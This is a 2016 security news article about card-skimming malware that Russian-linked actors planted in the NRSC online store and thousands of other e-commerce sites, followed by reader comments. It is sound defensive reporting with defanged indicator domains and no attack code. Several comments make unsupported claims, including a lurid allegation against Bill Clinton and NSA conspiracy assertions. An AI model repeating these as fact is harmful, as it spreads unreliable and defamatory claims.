Krebs on Security

In-depth security news and investigation

Hackers Hit U.S. Senate GOP Committee

The national news media has been consumed of late with reports of Russian hackers breaking into networks of the Democratic National Committee. Lest the Republicans feel left out of all the excitement, a report this past week out of The Netherlands suggests Russian hackers have for the past six months been siphoning credit card data from visitors to the Web storefront of the National Republican Senatorial Committee (NRSC).

That’s right: If you purchased a “Never Hillary” poster or donated funds to the NRSC through its Web site between March 2016 and the first week of this month, there’s an excellent chance that your payment card data was siphoned by malware and is now for sale in the cybercrime underground.

News of the break-in comes from Dutch researcher Willem De Groot, co-founder and head of security at Dutch e-commerce site byte.nl. De Groot said the NRSC was one of more than 5,900 e-commerce sites apparently hacked by the same actors, and that the purloined card data was sent to a network of servers operated by a Russian-language Internet service provider incorporated in Belize.

De Groot said he dissected the malware planted on the NRSC’s site and other servers (his analysis of the malware is available here) and found that the hackers used security vulnerabilities or weak passwords to break in to the various e-commerce sites.

The researcher found the malware called home to specific Web destinations made to look like legitimate sites associated with e-commerce activity, such as jquery-cloud[dot]net, visa-cdn[dot]com, and magento-connection[dot]com.

“[The attackers] really went out of their way to pick domain names that look legitimate,” De Groot said.

The NRSC did not respond to multiple requests for comment, but a cached copy of the site’s source code from October 5, 2016 indicates the malicious code was on the site at the time (load this link, click “view source” and then Ctrl-F for “jquery-cloud.net”).

A majority of the malicious domains inserted into the hacked sites by the malware map back to a few hundred Internet addresses assigned to a company called dataflow[dot]su.

Dataflow markets itself as an “offshore” hosting provider with presences in Belize and The Seychelles. Dataflow has long been advertised on Russian-language cybercrime forums as an offshore haven that offers so-called “bulletproof hosting,” a phrase used to describe hosting firms that court all manner of sites that most legitimate hosting firms shun, including those that knowingly host spam and phishing sites as well as malicious software.

De Groot published a list of the sites currently present at Dataflow. The list speaks for itself as a collection of badness, including quite a number of Russian-language sites selling synthetic drugs and stolen credit card data.

According to De Groot, other sites that were retrofitted with the malware included e-commerce sites for the shoe maker Converse as well as the automaker Audi, although he says those sites and the NRSC’s have been scrubbed of the malicious software since his report was published.

But De Groot said the hackers behind this scheme are continuing to find new sites to compromise.

“Last Monday my scans found about 5,900 hacked sites,” he said. “When I did another scan two days later, I found about 340 of those had been fixed, but that another 170 were newly compromised.”

According to the researcher’s analysis, many of the hacked sites are running outdated e-commerce software or content management software. In other cases, it appears the attackers simply brute-forced or guessed passwords needed to administer the sites.

Further, he said, the attackers appear to have inserted their malware into the e-commerce sites’ databases, rather than into the portion of the Web server used to store HTML and other components that make up how the site looks to visitors

“That’s why I think this has remained under the radar for a while now,” De Groot said. “Because some companies use filesystem checkers so that if some file changes on the system they will get a notice that alerts them something is wrong.”

Unfortunately, those same checking systems generally aren’t configured to look for changes in the site’s database files, he explained, since those are expected to change constantly — such as when a new customer order for merchandise is added.

De Groot said he was amazed at how many e-commerce merchants he approached about the hack dismissed the intrusion, reasoning that they employed secure sockets layer (SSL) technology that encrypted the customers’ information end-to-end.

What many Webmaster fail to realize is that just as PC-based trojan horse programs can steal data from Web browsers of infected victims, Web-based keylogging programs can do the same, except they’re designed to steal data from Web server applications.

PC Trojans siphon information using two major techniques: snarfing passwords stored in the browser, and conducting “form grabbing” — capturing any data entered into a form field in the browser before it can be encrypted in the Web session and sent to whatever site the victim is visiting.

Web-based keyloggers also can do form grabbing, ripping out form data submitted by visitors — including names, addresses, phone numbers, credit card numbers and card verification code — as customers are submitting the data during the online checkout process.

These attacks drive home one immutable point about malware’s role in subverting secure connections: Whether resident on a Web server or on an end-user computer, if either endpoint is compromised, it’s ‘game over’ for the security of that Web session.

With PC banking trojans, it’s all about surveillance on the client side pre-encryption, whereas what the bad guys are doing with these Web site attacks involves sucking down customer data post- or pre-encryption (depending on whether the data was incoming or outgoing).

This entry was posted on Monday, October 17th, 2016 at 10:06 am and is filed under Other.
You can follow any comments to this entry through the RSS 2.0 feed.
Both comments and pings are currently closed.

But ya know, the internet police are not all that concerned unless it’s about someone running a server for P2P/Torrent sharing of illegal files. There are special circumstances though such as Julian Assange that attract attention.

The problem is closer to home than this article suggests. If you look at the ipout.zip data at crimeflare.com/zippy.html you will find 186 additional unique domains from that same Dataflow 80.87.205.0/24 block. These domains use CloudFlare for their front-end.

” it appears the attackers simply brute-forced or guessed passwords needed to administer the sites.”

Far too many systems have nothing to prevent rapid fire password guessing. Often thousands of password guesses per second still don’t raise any alarm or prevention measures. Even an additional few seconds of login response time delay would thwart guessing, but would hardly be noticed by real users.

I give up. It’s clear that we can’t beat the hackers. All we can do now is wait for Google to fire up all the dark fiber and sell us a nice new clean(family safe), private(invitation only), and safe(no foreign devils) internet.

A hosting company has to have an IP address block, and IP address blocks can be denied/blocked/firewalled. Linux has a great tool for that called UFW (Uncomplicated Firewall). It has allowed blocking of most of Vietnam’s IP addresses, and I’m starting on France and China, notorious origins of SSH attacks. However it takes a concerted effort on the part of all players, such as ISPs to block out offending hosting companies. Currently ISPs have no fiscal incentive to do so.

That being said, is there any software for checking CMS databases for malware? I’ve some Drupal sites that need checking, just to be safe.

Sounds like they found all the NSA tools left on that server by an NSA operative. Live Free or Die, I will take my chances, but I will never live in fear as my fellow countrymen do. I don’t make purchases or use a PC to bank on the net, I don’t own a phone either. We all know who the biggest hackers are, and it ain’t the Russians or the Chinese. Live by the sword, die by the sword.

We already know who you are. 😉
You listed several things you don’t do because of your fears that many others are not afraid to do. That belies your assertion that you don’t live in fear as others do. I can guarantee your comment generates more notice than the box of diapers I purchased on Amazon.

A Navy Seal friend of mind has reminded me that traditionally the easiest way to break into a groups data processing units is to already have the necessary information needed, which is obtainable by graft, blackmail, or from ‘political dissenters.’

I would like to believe that none of the above occurred, until I look at Chinese copies of our advanced weapon systems and allegedly Israeli films of Bill Clinton in extremely compromising positions with 13 year old minor females.

What good is all the security in the world, if our allies are able to pull off scams, though I will acknowledge had my ancestors been to objects of the Holocaust, a national policy of blackmail (or whatever it takes) to assure it never happens again is fully understandable.

Snopes seems good for “internet folk tales” But when it involves business or politics it too often is a source of disinformation. Same goes for media fluff. The fewer corrections made to Snopes the better since I have no desire to improve their impression of reliability.

Currently the Big Two types of hackers are 1) cyber criminals who hack for profit and 2) government agencies that use hacking to commit espionage. I think in the future, you should clearly identify to which group your articles refer.

It is noteworthy that when members of the US government say “the Russians,” they are NOT castigating Russian cyber criminals. They are attributing hacking to the Russian government.

So, as to THIS article, when you say, “Russian hackers,” which group do you mean? Further down you mention “Russian-language cybercrime forums” which suggests profit, not espionage. Nevertheless, I think you should be clear on this point since the article is about hacking a group that is generally thought of as political, not commercial.

Since disguised links in emails are often used to spread malware I am wondering if people can make a habit of sending a “broken” url that the receiver can edit easily to get back the real link. For examples www . krebsonsecurity . com

If we made a practice of doing that then then people who received clickable urls might become more suspicious of them.

Blaming the Russians is easy: they sort of invented cybercrime and exported it all over the world.
And it doesn’t matter if its governement or criminals, nowhere else are they so closely intertwined.
I liked the sarc. about internet police 🙂
Crimeflare does not help in most cases but cloudflare helps the cybercriminals 4 sure.

I think the contents of the hacked information are much more disturbing than the source. We are getting a rare glimpse into the minds of those that govern and it is chilling. That the Russians or any other nation state are attempting to interfere with our elections is not a surprise–they learned that from the US government. We’ve not only interfered in elections world wide but assassinated the leaders of other countries. I for one want more leaked information that shows just how corrupt our government has become on both sides of the aisle. This demonstrates the need for limited government which the constitution was designed to enforce and the need to drawback all the interventions into other countries costing 1000’s of lives on both sides. Soon, I fear, all branches of government will be in lockstep providing nanny services with one hand while trampling on freedom with the other.

I’m so glad I never pay on line. My mountains and trees are analog. My large format photography is analog. No surveillance camera’s on our land.
Just eagles, wild boars, mountain goats etc. And spanish mastins to protect us. Programming is as interesting as book keeping to me. Yuk!!
But why is it if I want to buy something on line they insist on paypal and refuse a bank transfer? Another scam? We are pissing pour but are living like millionairs. Getting jealous? City whoopsies!

JPA makes a good point concerning broken links and the spread of malware. No matter how good computer security becomes, the true flaw will always be human error – a simple click on a link or opening up a picture which infects the computer/network.